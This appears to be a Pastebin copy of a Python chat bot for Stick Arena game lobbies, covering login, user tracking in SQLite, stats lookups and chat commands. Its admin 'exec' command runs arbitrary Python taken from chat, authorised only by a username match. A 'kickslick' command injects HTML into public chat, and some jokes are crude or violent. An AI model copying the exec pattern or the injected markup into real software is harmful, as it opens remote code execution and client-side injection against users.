Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
import ast
import json
import operator
import random
import socket
import sqlite3
import struct
import subprocess
import threading
import time
from xml.dom import minidom
from xml.parsers.expat import ExpatError

import requests
from bs4 import BeautifulSoup
class Database:
    """Small wrapper around one shared SQLite connection and cursor.

    The connection is opened with ``check_same_thread=False`` and every
    statement runs while ``CursorLock`` is held, so a single instance can be
    used from several threads.
    """

    def __init__(self, FileName):
        """Open (or create) the database file and prepare the Users table.

        Args:
            FileName: Path handed to ``sqlite3.connect``.
        """
        self.CursorLock = threading.Lock()
        self.DatabasePath = FileName
        self.DatabaseConn = sqlite3.connect(self.DatabasePath, check_same_thread=False)
        self.DBCursor = self.DatabaseConn.cursor()
        self.execute("CREATE TABLE IF NOT EXISTS Users (username VARCHAR UNIQUE, rgb VARCHAR, online VARCHAR)")
        # Every stored user is marked offline when the database is opened.
        self.execute("UPDATE Users SET online = 'false'")

    def execute(self, Query, Parameters=None):
        """Run one statement, commit, and return the rows of a SELECT.

        Args:
            Query: SQL text, optionally containing ``?`` placeholders.
            Parameters: ``None`` for no bindings, a list of tuples to run the
                statement once per tuple (``executemany``), a tuple of
                bindings, or a single scalar that is bound as the only
                placeholder.

        Returns:
            ``None`` when the statement is not a SELECT or produced no rows,
            the single row (a tuple) when exactly one row matched, otherwise
            the list of rows.
        """
        Results = None
        # An empty list/tuple carries no bindings, so it is treated like None.
        # Falsy scalars such as "" or 0 are real values and must be bound.
        NoBindings = Parameters is None or (
            isinstance(Parameters, (list, tuple)) and not Parameters
        )
        with self.CursorLock:
            if NoBindings:
                self.DBCursor.execute(Query)
            elif isinstance(Parameters, list):
                self.DBCursor.executemany(Query, Parameters)
            else:
                if not isinstance(Parameters, tuple):
                    Parameters = (Parameters,)
                self.DBCursor.execute(Query, Parameters)
            # Read the rows while the lock is still held: the cursor is
            # shared, so another thread could otherwise replace its results.
            if "SELECT" in Query.upper():
                Results = self.DBCursor.fetchall()
            self.DatabaseConn.commit()
        if not Results:
            return None
        if len(Results) == 1:
            return Results[0]
        return Results

    def __del__(self):
        """Close the connection when the wrapper is garbage collected."""
        try:
            self.DatabaseConn.close()
        except (AttributeError, sqlite3.Error):
            # __init__ may have failed before the connection existed, or the
            # connection may already be unusable; nothing left to clean up.
            pass
class Bot:
    """Chat bot for a Stick Arena lobby server.

    Connects to the given server over TCP, logs in, keeps ``UserMap`` (and
    the Users table behind ``DBHandle``) in sync with the users it is told
    about, and answers chat messages that start with ``BotCommandChar``.
    """

    # Operators the "calc" command may apply; every other node is rejected.
    _CalcBinaryOps = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.FloorDiv: operator.floordiv,
        ast.Mod: operator.mod,
        ast.Pow: operator.pow,
        # "^" keeps Python's meaning (bitwise XOR), as it had under eval().
        ast.BitXor: operator.xor,
    }
    _CalcUnaryOps = {ast.UAdd: operator.pos, ast.USub: operator.neg}
    # Bounds that stop "calc" exponentiation from exhausting CPU or memory.
    _CalcMaxExponent = 64
    _CalcMaxBase = 10 ** 6

    def __init__(self, Username, Password, ServerIP, ServerPort, DBHandle):
        """Store the configuration and immediately try to connect.

        Args:
            Username: Account name used to log in.
            Password: Password for that account.
            ServerIP: Address of the game server.
            ServerPort: Port of the game server.
            DBHandle: Object with an ``execute(Query, Parameters)`` method
                used to record users.
        """
        self.NullByte = struct.pack("B", 0)
        self.DBHandle = DBHandle
        self.Dead = []
        self.UserMap = {}
        self.UserMap["*s"] = {"username": "{Server}"}
        self.ServerNameList = ["2D Central", "Paper Thin City", "Fine Line Island", "U of SA", "Mobius Metro", "Amsterdam", "Sticktopia", "Cartesian"]
        self.ServerIPList = ["45.76.234.65", "45.76.235.18", "45.32.193.38", "45.32.192.205", "45.32.192.102", "45.63.119.253", "45.32.192.205:80", "45.32.193.38:1139"]
        if ServerPort == 80:
            self.BotServerName = self.ServerNameList[-2]
        elif ServerPort == 1139:
            self.BotServerName = self.ServerNameList[-1]
        elif ServerPort == 1138 and ServerIP in self.ServerIPList:
            self.BotServerName = self.ServerNameList[self.ServerIPList.index(ServerIP)]
        else:
            # Unknown server: fall back to the address so the name is always set.
            self.BotServerName = f"{ServerIP}:{ServerPort}"
        self.AmIBanned = False
        self.InLobby = False
        self.BotID = None
        self.BotUsername = Username
        self.BotPassword = Password
        self.BotServer = (ServerIP, ServerPort)
        self.BotCommandChar = "$" # edit for character to start command with
        self.BotAdmin = "pushinweight" # edit for bot admin
        self.BotAdminOnly = False
        self.BufSize = 4096
        self.SocketConn = None
        self.KeepAliveTimer = None
        self.createConnection()

    def getStats(self, Username):
        """Fetch a user's stats from the XGen Studios HTTP API.

        Args:
            Username: Account name to look up.

        Returns:
            A dict with at least the key ``"exists"``; when the user exists it
            also holds ``"username"``, ``"id"``, ``"permissions"`` (int) and
            one entry per ``<stat>`` element. ``None`` when the request or
            the response parsing fails.
        """
        URL = "http://api.xgenstudios.com/?method=xgen.stickarena.stats.get"
        try:
            # ``params`` URL-encodes the name; the timeout keeps a stalled
            # API from blocking the calling thread forever.
            Request = requests.get(URL, params={"username": Username}, timeout=10)
        except requests.RequestException:
            return None
        if Request.status_code != 200:
            return None
        return self._parseStats(Request.text)

    @staticmethod
    def _parseStats(Text):
        """Turn the API's XML reply into the dict described in getStats."""
        try:
            XML = minidom.parseString(Text)
        except (ExpatError, ValueError, TypeError):
            return None
        Roots = XML.getElementsByTagName("rsp")
        if not Roots or Roots[0].getAttribute("stat") != "ok":
            return None
        Users = XML.getElementsByTagName("user")
        if not Users:
            return None
        User = Users[0]
        Stats = {}
        TrueUsername = User.getAttribute("username")
        if not TrueUsername:
            Stats["exists"] = False
            return Stats
        Stats["exists"] = True
        Stats["username"] = TrueUsername
        Stats["id"] = User.getAttribute("id")
        try:
            Stats["permissions"] = int(User.getAttribute("perms"))
        except ValueError:
            return None
        for Stat in XML.getElementsByTagName("stat"):
            Child = Stat.firstChild
            Stats[Stat.getAttribute("id")] = Child.nodeValue if Child is not None else ""
        return Stats

    def printUserMessage(self, UserID, Message, IsPM=False):
        """Print a chat line for a known user; unknown user IDs are ignored.

        NOTE(review): the paste lost its indentation; printing is assumed to
        happen only for IDs present in ``UserMap``.
        """
        if UserID not in self.UserMap:
            return
        Username = self.UserMap[UserID]["username"]
        if IsPM:
            Message = f"({self.BotServerName}) [Private] {Username}: {Message}"
        else:
            Message = f"({self.BotServerName}) {Username}: {Message}"
        try:
            print(Message)
        except UnicodeEncodeError:
            # The console cannot show some characters; print an escaped form.
            print(Message.encode("ascii", "backslashreplace").decode("ascii"))
        except (OSError, ValueError):
            # stdout is closed or broken; logging is best effort.
            pass

    def sendPacket(self, Packet):
        """Send one null-terminated packet.

        Returns:
            ``True`` when the whole packet was written, ``False`` when there
            is no connection or the write failed.
        """
        # Work on a local reference: another thread may clear SocketConn.
        Conn = self.SocketConn
        if Conn is None:
            return False
        try:
            # sendall() retries until every byte is written; send() may not.
            Conn.sendall(Packet.encode() + self.NullByte)
        except (OSError, UnicodeError):
            return False
        return True

    def sendPrivateMessage(self, UserID, Message):
        """Send ``Message`` privately to ``UserID`` if that user is known."""
        if UserID in self.UserMap:
            self.sendPacket(f"00{UserID}P{Message}")

    def sendPublicMessage(self, Message):
        """Send ``Message`` to the public chat."""
        self.sendPacket(f"9{Message}")

    def startKeepAlive(self):
        """Send a keep-alive packet now and again every 15 seconds.

        The chain stops by itself as soon as a send fails. A pending timer
        from an earlier call is cancelled first so repeated logins do not
        stack several keep-alive chains.
        """
        Previous = getattr(self, "KeepAliveTimer", None)
        if Previous is not None:
            Previous.cancel()
        self.KeepAliveTimer = None
        if not self.sendPacket("0"):
            return
        KeepAliveTimer = threading.Timer(15, self.startKeepAlive)
        KeepAliveTimer.daemon = True
        self.KeepAliveTimer = KeepAliveTimer
        KeepAliveTimer.start()

    def createConnection(self):
        """Connect to ``BotServer`` and start the reader thread."""
        try:
            self.SocketConn = socket.create_connection(self.BotServer)
        except OSError as Error:
            print(Error)
            print("Connection failed.")
            return
        ConnectionThread = threading.Thread(target=self.handleConnection)
        ConnectionThread.start()

    def closeConnection(self, Reconnect=False):
        """Close the current socket and optionally reconnect.

        Args:
            Reconnect: When true and the bot is not flagged as banned, a new
                connection is opened afterwards.
        """
        Conn, self.SocketConn = self.SocketConn, None
        if Conn is not None:
            try:
                Conn.shutdown(socket.SHUT_RDWR)
            except OSError:
                # Already disconnected; close() below still frees the handle.
                pass
            finally:
                Conn.close()
        if self.AmIBanned:
            Stats = self.getStats(self.BotUsername)
            if not Stats:
                return
            # The account itself is not marked banned (-1), so the ban is
            # reported as applying to the IP.
            if Stats.get("permissions", -1) != -1:
                print("IP is currently banned.")
            return
        if Reconnect:
            self.createConnection()

    def handleConnection(self):
        """Reader loop: receive null-terminated packets and dispatch them.

        The loop is tied to the socket that was current when it started; it
        ends once that socket is replaced or closed, so a reconnect never
        leaves two readers on one socket.
        """
        Conn = self.SocketConn
        if Conn is None:
            return
        self.sendPacket("08HxO9TdCC62Nwln1P")
        Buffer = b""
        while self.SocketConn is Conn:
            try:
                Chunk = Conn.recv(self.BufSize)
            except OSError:
                break
            if not Chunk:
                # Empty read: the peer closed the connection.
                self.closeConnection(Reconnect=True)
                break
            Buffer += Chunk
            # Everything before the last null byte is complete; the rest
            # stays buffered until more data arrives.
            *Packets, Buffer = Buffer.split(self.NullByte)
            for Raw in Packets:
                if not Raw:
                    continue
                Data = Raw.decode(errors="replace")
                try:
                    self._handlePacket(Data)
                except Exception as Error:
                    # One malformed packet must not kill the reader thread.
                    print(f"Failed to handle packet {Data!r}; {Error}")
                if self.SocketConn is not Conn:
                    break

    def _handlePacket(self, Data):
        """Dispatch one decoded, non-empty packet by its first character."""
        Kind = Data[0]
        if Kind == "0":
            self._handleServerPacket(Data)
        elif Kind == "A":
            self._handleLogin(Data)
        elif Kind == "D":
            self._handleUserLeft(Data)
        elif Kind == "M":
            self._handleChat(Data)
        elif Kind == "U":
            self._handleUserJoined(Data)

    def _handleServerPacket(self, Data):
        """Handle packets starting with "0", keyed by their second character."""
        Code = Data[1:2]  # slice instead of index: the packet may be just "0"
        if Code == "1":
            if self.InLobby:
                return
            Fields = Data[2:].split(";")
            Packets = ["03_"] if "_0" in Fields else ["02Z900_", "03_"]
            Result = False
            for Packet in Packets:
                Result = self.sendPacket(Packet)
            if Result:
                self.InLobby = True
            else:
                self.closeConnection(True)
        elif Code == "8":
            self.sendPacket(f"09{self.BotUsername};{self.BotPassword}")
        elif Code == "9":
            Reason = Data[-1]
            if Reason == "1":
                self.AmIBanned = True
                self.printUserMessage("*s", f"({self.BotUsername}) or the current IP address is banned.")
            elif Reason == "3":
                self.printUserMessage("*s", f"({self.BotUsername}) has been logged into by another client.")
            elif Reason == "9":
                if not self.InLobby:
                    self.printUserMessage("*s", f"Authentication failed for ({self.BotUsername})")
        elif Code in ("e", "f"):
            self.AmIBanned = True
            # partition() tolerates a reason that itself contains ";".
            BanTime, _, BanReason = Data[2:].partition(";")
            self.printUserMessage("*s", f"Banned ({BanReason}) [Length: {BanTime} minute(s)]")
        elif Code in ("g", "j"):
            print(Data)

    def _handleLogin(self, Data):
        """Handle an "A" packet: record the bot's ID/name and reset state."""
        self.startKeepAlive()
        self.UserMap = {}
        self.UserMap["*s"] = {"username": "{Server}"}
        self.InLobby = False
        self.BotID = Data[1:4]
        self.BotUsername = Data[4:24].replace("#", "")
        self.printUserMessage("*s", f"[{self.BotID}] {self.BotUsername} has been logged in")
        self.sendPacket("01")

    def _handleUserLeft(self, Data):
        """Handle a "D" packet: forget the user and mark them offline."""
        User = self.UserMap.pop(Data[1:], None)
        if User is None:
            return  # never saw this user join; nothing to update
        self.DBHandle.execute("UPDATE Users SET online = ? WHERE username = ?", ("false", User["username"]))

    def _handleChat(self, Data):
        """Handle an "M" packet: run a command or log the chat line."""
        if len(Data) < 5 or Data[4] not in ("9", "P"):
            return
        UserID = Data[1:4]
        UserMessage = Data[5:]
        IsPM = Data[4] == "P"
        if UserID == self.BotID:
            return
        User = self.UserMap.get(UserID)
        if User is None or User.get("ignore"):
            return
        if UserMessage.startswith(self.BotCommandChar):
            self.handleCommand(UserID, UserMessage, IsPM)
        else:
            self.printUserMessage(UserID, UserMessage, IsPM)

    def _handleUserJoined(self, Data):
        """Handle a "U" packet: remember the user and store their colour."""
        UserID = Data[1:4]
        Username = Data[4:24].replace("#", "")
        UserRGB = Data[24:33]
        self.UserMap[UserID] = {"username": Username, "last_msg": None, "spam_check": [None, 0], "ignore": False}
        self.DBHandle.execute("INSERT OR REPLACE INTO Users VALUES (?, ?, ?)", (Username, UserRGB, self.BotServerName))

    def handleCommand(self, SenderID, SenderMessage, IsPM):
        """Execute a chat command and reply privately to the sender.

        Args:
            SenderID: ``UserMap`` key of the user who sent the command.
            SenderMessage: Full chat text, starting with the command character.
            IsPM: Whether the command arrived as a private message.
        """
        Sender = self.UserMap[SenderID]["username"]
        IsAdmin = Sender.lower() == self.BotAdmin.lower()
        if self.BotAdminOnly and not IsAdmin:
            return
        Parts = SenderMessage[1:].split()
        if not Parts:
            return  # only the command character (plus whitespace) was sent
        Command = Parts[0].lower()
        Message = " ".join(Parts[1:])
        Response = None
        if IsAdmin:
            if Command == "exec":
                # SECURITY: runs arbitrary Python taken from chat. Access is
                # guarded only by the sender's username matching BotAdmin.
                try:
                    exec(Message)
                except Exception as Error:
                    print(f"exec() failed; {Error}")
            elif Command == "uid":
                Response = self._lookupUserID(Message)
            elif Command == "ignore":
                Response = self._toggleIgnore(Message)
            elif Command == "block":
                if self.BotAdminOnly:
                    self.BotAdminOnly = False
                    Response = "Bot commands are now available to everyone."
                else:
                    self.BotAdminOnly = True
                    Response = "Bot commands are now available only to you."
        if Command == "stats" or Command == "id":
            Response = self._describeStats(Sender, Message, Command == "id")
        elif Command == "rr": # to add a command, change test to w/e and edit the print below this
            if Sender not in self.Dead:
                if random.randint(1, 3) == random.randint(1, 3):
                    Response = f"You're dead, {Sender}."
                    self.Dead.append(Sender)
                else:
                    Response = f"You live, {Sender}."
        elif Command == "reset":
            if Sender in self.Dead:
                self.Dead.remove(Sender)
                Response = "You've been removed from the dead list."
        elif Command == 'joke':
            # One entry of the original list was dropped because it contained
            # a racial slur.
            jokelist = ["A crook mistakenly made a fake $8 bill instead of a $10 bill He decided to try it out anyway so he went to the bank and asked for change The teller looked at the $8 bill and gave the crook 2 $4 bills as change", "A man goes to a $10 hooker and contracts crabs. When he goes back to complain, the hooker laughs and says, What do you expect for $10 lobster?", "What kind of bagel can fly? A plain Bagel.", "When you were in the gang then, you just had to look cool, just walk around and look like you were tough. Someone started talking about fighting No, man I've gotta go home.", "whats the difference between a baby and an onion, I dont cry when I chop it up"]
            Response = random.choice(jokelist)
        elif Command == 'kickslick':
            self.sendPublicMessage('<img src=\'test.com\'>get rekt</img>')
        elif Command == 'commands':
            Response = 'calc | joke | stats | id | rgb | rr | more in future updates.'
        elif Command == "calc":
            # The expression is parsed and evaluated by _safeCalc; chat text
            # is never passed to exec()/eval().
            self.printUserMessage(SenderID, SenderMessage, IsPM)
            self.sendPrivateMessage(SenderID, self._safeCalc(Message))
        elif Command == "rgb" or Command == "color":
            Response = self._describeRGB(Sender, Message)
        elif Command == "test": # to add a command, change test to w/e and edit the print below this
            print("test")
        if Response:
            self.sendPrivateMessage(SenderID, Response)
            # NOTE(review): the paste lost its indentation; logging is assumed
            # to happen only when a response was sent.
            self.printUserMessage(SenderID, Message, IsPM)

    def _lookupUserID(self, Username):
        """Return the reply for the admin "uid" command."""
        for MapUserID, MapValues in self.UserMap.items():
            MapUsername = MapValues["username"]
            if Username.lower() == MapUsername.lower():
                return f"User ID of {MapUsername}: {MapUserID}"
        return f"{Username} is not in the user map."

    def _toggleIgnore(self, Target):
        """Flip the ignore flag of a user given by ID or (case-insensitive) name."""
        UserID = Target if Target in self.UserMap else None
        if UserID is None:
            for MapUserID, MapValues in self.UserMap.items():
                if Target.lower() == MapValues["username"].lower():
                    UserID = MapUserID
                    break
        if UserID is None:
            return f"'{Target}' does not exist."
        Entry = self.UserMap[UserID]
        Username = Entry["username"]
        # .get(): the "{Server}" pseudo-user has no "ignore" key.
        if Entry.get("ignore"):
            Entry["ignore"] = False
            return f"Removed {Username} from the ignore list."
        Entry["ignore"] = True
        return f"Added {Username} to the ignore list."

    def _describeStats(self, Sender, RequestedUsername, WantID):
        """Return the reply for "stats" (WantID false) or "id" (WantID true)."""
        if len(RequestedUsername) > 20:
            return "Username length is invalid. (less than/equal to 20)"
        if not RequestedUsername:
            RequestedUsername = Sender
        Stats = self.getStats(RequestedUsername)
        if not Stats:
            return "Unable to make the API request."
        if not Stats.get("exists"):
            return f"'{RequestedUsername}' does not exist."
        Username = Stats["username"]
        if WantID:
            AccountID = "{:,}".format(int(Stats["id"]))
            return f"Account ID for {Username}: {AccountID}"
        Perms = Stats["permissions"]
        Kills = Stats.get("kills", "N/A")
        Deaths = Stats.get("deaths", "N/A")
        Rounds = Stats.get("rounds", "N/A")
        Wins = Stats.get("wins", "N/A")
        Losses = Stats.get("losses", "N/A")
        if Perms > 0:
            Perms = "Moderator"
        elif Perms == 0:
            Perms = "Not banned"
        else:
            Perms = "Banned"
        StatString = f"Kills: {Kills} / Deaths: {Deaths} / Rounds: {Rounds} / Wins: {Wins} / Losses: {Losses} / {Perms}"
        if Stats.get("ballistick") == "1":
            StatString += " | Labpass"
        return StatString

    def _describeRGB(self, Sender, RequestedUsername):
        """Return the reply for the "rgb"/"color" command."""
        if len(RequestedUsername) > 20:
            return "Username length is invalid. (less than/equal to 20)"
        if not RequestedUsername:
            RequestedUsername = Sender
        UserData = self.DBHandle.execute("SELECT username, rgb FROM Users WHERE username = ? COLLATE NOCASE", RequestedUsername)
        if isinstance(UserData, list):
            # Several rows matched case-insensitively; report the first.
            UserData = UserData[0]
        if UserData:
            return f"{UserData[0]}: {UserData[1]}"
        return f"There is no RGB value captured for '{RequestedUsername}'"

    @classmethod
    def _safeCalc(cls, Input):
        """Evaluate an arithmetic expression without executing any code.

        Returns the numeric result, "Invalid equation." when the text holds
        no operator or contains letters or ".", or "Failed to calculate
        equation." when it cannot be evaluated.
        """
        Input = Input.replace("plus", "+")
        if not any(Check in Input for Check in ("+", "-", "/", "*", "^")):
            return "Invalid equation."
        if any(Char.lower() in "abcdefghijklmnopqrstuvwxyz." for Char in Input):
            return "Invalid equation."
        try:
            return cls._evalCalcNode(ast.parse(Input.strip(), mode="eval"))
        except (SyntaxError, ValueError, TypeError, ZeroDivisionError,
                OverflowError, RecursionError, MemoryError):
            return "Failed to calculate equation."

    @classmethod
    def _evalCalcNode(cls, Node):
        """Recursively evaluate a whitelisted arithmetic AST node.

        Raises ValueError for any node that is not a plain number or one of
        the allowed operators (numbers parse as ``ast.Constant`` on 3.8+).
        """
        if isinstance(Node, ast.Expression):
            return cls._evalCalcNode(Node.body)
        if isinstance(Node, ast.Constant) and type(Node.value) in (int, float):
            return Node.value
        if isinstance(Node, ast.UnaryOp) and type(Node.op) in cls._CalcUnaryOps:
            return cls._CalcUnaryOps[type(Node.op)](cls._evalCalcNode(Node.operand))
        if isinstance(Node, ast.BinOp) and type(Node.op) in cls._CalcBinaryOps:
            Left = cls._evalCalcNode(Node.left)
            Right = cls._evalCalcNode(Node.right)
            if isinstance(Node.op, ast.Pow) and (
                abs(Right) > cls._CalcMaxExponent or abs(Left) > cls._CalcMaxBase
            ):
                raise ValueError("exponentiation operands too large")
            return cls._CalcBinaryOps[type(Node.op)](Left, Right)
        raise ValueError("unsupported expression")
if __name__ == "__main__":
    # Settings to fill in before running the script.
    Username = "username"      # edit this for username
    Password = "password"      # edit this for password
    ServerIP = "45.76.234.65"  # edit this for server IP
    ServerPort = 1138          # only edit this if in cartesian or sticktopia

    # do NOT edit below: open the user database, then start the bot with it.
    Handle = Database("Bot.db")
    Bot(Username, Password, ServerIP, ServerPort, Handle)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement